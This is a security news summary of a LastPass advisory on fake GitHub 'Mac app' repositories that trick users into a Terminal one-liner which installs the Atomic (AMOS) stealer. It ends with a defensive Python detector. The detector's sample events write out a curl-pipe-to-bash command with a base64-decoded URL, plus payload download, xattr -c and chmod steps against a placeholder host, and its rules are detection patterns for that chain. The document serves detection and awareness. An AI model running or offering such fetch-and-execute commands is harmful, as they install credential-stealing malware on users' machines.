SEO-poisoned GitHub Repos Push Atomic Stealer to macOS
Research and an advisory from the LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team report an ongoing macOS-focused operation aiming to deliver Atomic (AMOS) information-stealing malware via fraudulent GitHub repositories posing as “Mac” or “MacBook” desktop apps. Per LastPass, the campaign leans on search engine optimization (SEO) to place these fake project pages prominently on Google and Bing, then funnels users to copy a Terminal command as part of a quick install. Repository themes point to broad targeting across technology and financial services, with pages imitating well-known platforms; examples include “github[.]com/Charles-Schwab-Desktop-on-MacBook,” “github[.]com/Citibank-on-MacBook-Desktop-App,” “github[.]com/Confluence-on-MacBook,” “github[.]com/Gemini-on-MacBook,” “github[.]com/Salesloft-on-MacBook,” and “github[.]com/SentinelOne-on-MacBook.” The TIME team also identified repositories impersonating LastPass itself, indicating the operators are seeding dozens of look-alike projects across multiple accounts; as LastPass notes, “Notably, the GitHub pages appear to be created by multiple GitHub usernames to get around takedowns.” A large set of copycat repositories was reported for more than one hundred software titles, and the use of “ClickFix” lures is tuned for macOS searchers.
LastPass details the infection sequence observed in a repository posted on September 16, 2025 by the alias “modhopmduck476,” which presented as “LastPass for macOS.” The page instructs victims to run a one-liner in “Terminal” that fetches and executes an installer, with a base64-encoded URL. The base64 decodes to a remote “install.sh,” which immediately pulls a second stage. This sequence writes the Atomic payload as “/tmp/update,” clears quarantine metadata via “xattr -c,” marks it executable with “chmod +x,” and runs it, at which point AMOS begins credential and data theft consistent with prior campaigns. The observable process and file activity center on “/bin/bash” with a base64 URL being decoded, “curl,” retrieval of “install.sh,” creation and execution of “/tmp/update,” and use of “xattr” to remove extended attributes before launch. LastPass says it is actively pursuing takedowns and IOC sharing and that it “will continue to monitor this campaign and provide updates as warranted.”
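The process and file activity described above (base64 decode inside a shell, curl fetching an installer, xattr -c and chmod +x on /tmp/update, then execution from /tmp) can be correlated into a per-session detection. The following is an added example, not LastPass's code or tooling: it runs simple stage rules over constructed EDR-style process events, with the event field names, the `tree` grouping key and the host/URL values all assumed for illustration.

```python
import os
import re
import shlex
from collections import defaultdict

SHELLS = {"bash", "sh", "zsh"}

# Constructed EDR-style process events (not real telemetry). "tree" groups
# processes descending from one Terminal session so stages can be correlated.
SAMPLE_EVENTS = [
    {"tree": 501, "exe": "/bin/bash", "cmd": 'bash -c "curl -fsSL $(echo QUFBQQ== | base64 -D) | bash"'},
    {"tree": 501, "exe": "/usr/bin/curl", "cmd": "curl -fsSL https://example.invalid/install.sh"},
    {"tree": 501, "exe": "/usr/bin/curl", "cmd": "curl -fsSL https://example.invalid/u -o /tmp/update"},
    {"tree": 501, "exe": "/usr/bin/xattr", "cmd": "xattr -c /tmp/update"},
    {"tree": 501, "exe": "/bin/chmod", "cmd": "chmod +x /tmp/update"},
    {"tree": 501, "exe": "/tmp/update", "cmd": "/tmp/update"},
    # Benign session: a single stage (a download into /tmp) must not trigger a verdict.
    {"tree": 777, "exe": "/usr/bin/curl", "cmd": "curl -fsSL https://example.invalid/api -o /tmp/page.html"},
    {"tree": 777, "exe": "/usr/bin/xattr", "cmd": "xattr -c ~/Downloads/report.pdf"},
    {"tree": 777, "exe": "/bin/chmod", "cmd": "chmod +x ./build.sh"},
]

def classify_event(ev):
    """Return the set of chain stages a single process event matches."""
    exe, cmd = ev["exe"], ev["cmd"]
    name = os.path.basename(exe)
    argv = shlex.split(cmd)
    tmp_target = any(a.startswith("/tmp/") for a in argv)
    stages = set()
    if name in SHELLS and re.search(r"\bbase64\s+(?:-D|-d|--decode)\b", cmd):
        stages.add("base64_decode_in_shell")   # encoded URL decoded inside the shell
    if name == "curl" and ("install.sh" in cmd or ("-o" in argv and tmp_target)):
        stages.add("curl_fetch")               # installer or payload download
    if name == "xattr" and "-c" in argv and tmp_target:
        stages.add("quarantine_cleared")       # Gatekeeper quarantine attribute stripped
    if name == "chmod" and "+x" in argv and tmp_target:
        stages.add("made_executable")
    if exe.startswith("/tmp/"):
        stages.add("tmp_exec")                 # payload launched from /tmp
    return stages

def detect_chain(events, min_stages=3):
    """Correlate stages per process tree; flag trees that look like the AMOS chain."""
    by_tree = defaultdict(set)
    for ev in events:
        by_tree[ev["tree"]] |= classify_event(ev)
    decisive = {"quarantine_cleared", "tmp_exec"}
    return {t: sorted(s) for t, s in by_tree.items()
            if len(s) >= min_stages and s & decisive}
```

`detect_chain(SAMPLE_EVENTS)` flags only tree 501 with all five stages; the benign session matches one stage and stays below the threshold.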